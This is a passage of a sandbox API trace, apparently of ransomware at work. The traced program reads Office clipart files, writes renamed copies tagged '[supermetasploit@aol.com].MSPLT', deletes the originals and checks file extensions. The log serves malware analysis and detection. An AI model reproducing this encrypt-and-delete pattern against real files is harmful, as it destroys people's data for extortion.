hFile=0x468, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0292.678] WriteFile (in: hFile=0x46c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0292.678] SetEndOfFile (hFile=0x46c) returned 1 [0292.745] CloseHandle (hObject=0x46c) returned 1 [0292.748] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.749] SetEndOfFile (hFile=0x468) returned 1 [0292.807] CloseHandle (hObject=0x468) returned 1 [0292.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0293.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.238] lstrlenW (lpString=".doc") returned 4 [0293.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString=".docx") returned 5 [0293.239] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.239] lstrlenW (lpString=".pdf") returned 4 [0293.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString=".xls") returned 4 [0293.239] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.239] lstrlenW (lpString=".xlsx") returned 5 [0293.239] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.239] lstrlenW (lpString=".ppt") returned 4 [0293.239] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.239] lstrlenW (lpString=".zip") returned 4 [0293.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.239] lstrlenW (lpString=".rar") returned 4 [0293.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString=".bz2") returned 4 [0293.239] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString=".7z") returned 3 [0293.239] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.239] lstrlenW (lpString=".dbf") returned 4 [0293.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.239] lstrlenW (lpString=".1cd") returned 4 [0293.239] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.240] lstrlenW (lpString=".jpg") returned 4 [0293.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.240] lstrlenW (lpString=".doc") returned 4 [0293.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.240] lstrlenW (lpString=".docx") returned 5 [0293.240] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.240] lstrlenW (lpString=".pdf") returned 4 [0293.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.240] lstrlenW (lpString=".xls") returned 4 [0293.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.240] lstrlenW (lpString=".xlsx") returned 5 [0293.274] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.274] lstrlenW (lpString=".ppt") returned 4 [0293.274] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.274] lstrlenW (lpString=".zip") returned 4 [0293.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.274] lstrlenW (lpString=".rar") returned 4 [0293.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.274] lstrlenW (lpString=".bz2") returned 4 [0293.274] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.274] lstrlenW (lpString=".7z") returned 3 [0293.274] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.274] lstrlenW (lpString=".dbf") returned 4 [0293.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.274] lstrlenW (lpString=".1cd") returned 4 [0293.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0293.274] lstrlenW (lpString=".jpg") returned 4 [0293.274] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.275] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.275] lstrlenW (lpString="AN02559_.WMF") returned 12 [0293.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0293.485] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=6632) returned 1 [0293.485] CloseHandle (hObject=0x478) returned 1 [0293.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf")) returned 0x220 [0293.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0293.486] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.486] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0293.486] GetLastError () returned 0x0 [0293.486] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x19e8, lpOverlapped=0x0) returned 1 [0293.572] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x19f0, lpOverlapped=0x0) returned 1 [0293.574] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.574] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0293.574] SetEndOfFile (hFile=0x48c) returned 1 [0293.574] CloseHandle (hObject=0x48c) returned 1 [0293.580] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.580] SetEndOfFile (hFile=0x478) returned 1 [0293.586] CloseHandle (hObject=0x478) returned 1 [0293.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0293.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.588] lstrlenW (lpString=".doc") returned 4 [0293.588] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.588] lstrlenW (lpString=".docx") returned 5 [0293.588] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.588] lstrlenW (lpString=".pdf") returned 4 [0293.588] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.588] lstrlenW (lpString=".xls") returned 4 [0293.588] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.588] lstrlenW (lpString=".xlsx") returned 5 [0293.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.588] lstrlenW (lpString=".ppt") returned 4 [0293.588] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.588] lstrlenW (lpString=".zip") returned 4 [0293.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.588] lstrlenW (lpString=".rar") returned 4 [0293.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.588] lstrlenW (lpString=".bz2") returned 4 [0293.588] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.588] lstrlenW (lpString=".7z") returned 3 [0293.588] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString=".dbf") returned 4 [0293.589] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString=".1cd") returned 4 [0293.589] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString=".jpg") returned 4 [0293.589] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString=".doc") returned 4 [0293.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString=".docx") returned 5 [0293.589] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.589] lstrlenW (lpString=".pdf") returned 4 [0293.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString=".xls") returned 4 [0293.589] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.589] lstrlenW (lpString=".xlsx") returned 5 [0293.589] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.589] lstrlenW (lpString=".ppt") returned 4 [0293.589] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.589] lstrlenW (lpString=".zip") returned 4 [0293.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.589] lstrlenW (lpString=".rar") returned 4 [0293.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.589] lstrlenW (lpString=".bz2") returned 4 [0293.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.590] lstrlenW (lpString=".7z") returned 3 [0293.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.590] lstrlenW (lpString=".dbf") returned 4 [0293.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.590] lstrlenW (lpString=".1cd") returned 4 [0293.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0293.590] lstrlenW (lpString=".jpg") returned 4 [0293.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.590] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.590] lstrlenW (lpString="AN03500_.WMF") returned 12 [0293.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0293.598] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=9240) returned 1 [0293.598] CloseHandle (hObject=0x478) returned 1 [0293.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf")) returned 0x220 [0293.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0293.599] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.599] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0293.601] GetLastError () returned 0x0 [0293.601] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2418, lpOverlapped=0x0) returned 1 [0293.652] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2420, lpOverlapped=0x0) returned 1 [0293.653] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.653] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0293.653] SetEndOfFile (hFile=0x48c) returned 1 [0294.122] CloseHandle (hObject=0x48c) returned 1 [0294.131] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.131] SetEndOfFile (hFile=0x478) returned 1 [0294.136] CloseHandle (hObject=0x478) returned 1 [0294.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.137] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0294.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.138] lstrlenW (lpString=".doc") returned 4 [0294.138] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.138] lstrlenW (lpString=".docx") returned 5 [0294.138] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.138] lstrlenW (lpString=".pdf") returned 4 [0294.138] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.138] lstrlenW (lpString=".xls") returned 4 [0294.138] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.138] lstrlenW (lpString=".xlsx") returned 5 [0294.138] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.138] lstrlenW (lpString=".ppt") returned 4 [0294.138] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.138] lstrlenW (lpString=".zip") returned 4 [0294.138] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.138] lstrlenW (lpString=".rar") returned 4 [0294.138] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.138] lstrlenW (lpString=".bz2") returned 4 [0294.138] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.138] lstrlenW (lpString=".7z") returned 3 [0294.139] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.139] lstrlenW (lpString=".dbf") returned 4 [0294.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.139] lstrlenW (lpString=".1cd") returned 4 [0294.139] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.139] lstrlenW (lpString=".jpg") returned 4 [0294.139] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.139] lstrlenW (lpString=".doc") returned 4 [0294.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString=".docx") returned 5 [0294.139] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.139] lstrlenW (lpString=".pdf") returned 4 [0294.139] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString=".xls") returned 4 [0294.139] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.139] lstrlenW (lpString=".xlsx") returned 5 [0294.139] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.139] lstrlenW (lpString=".ppt") returned 4 [0294.139] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.140] lstrlenW (lpString=".zip") returned 4 [0294.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.140] lstrlenW (lpString=".rar") returned 4 [0294.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.140] lstrlenW (lpString=".bz2") returned 4 [0294.140] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.140] lstrlenW (lpString=".7z") returned 3 [0294.140] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.140] lstrlenW (lpString=".dbf") returned 4 [0294.140] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.140] lstrlenW (lpString=".1cd") returned 4 [0294.140] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0294.140] lstrlenW (lpString=".jpg") returned 4 [0294.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.140] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.140] lstrlenW (lpString="AN04195_.WMF") returned 12 [0294.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0294.141] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=4612) returned 1 [0294.141] CloseHandle (hObject=0x478) returned 1 [0294.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf")) returned 0x220 [0294.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0294.142] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.142] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0294.143] GetLastError () returned 0x0 [0294.143] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x1204, lpOverlapped=0x0) returned 1 [0294.185] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x1210, lpOverlapped=0x0) returned 1 [0294.186] ReadFile (in: hFile=0x478, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0294.186] WriteFile (in: hFile=0x48c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, 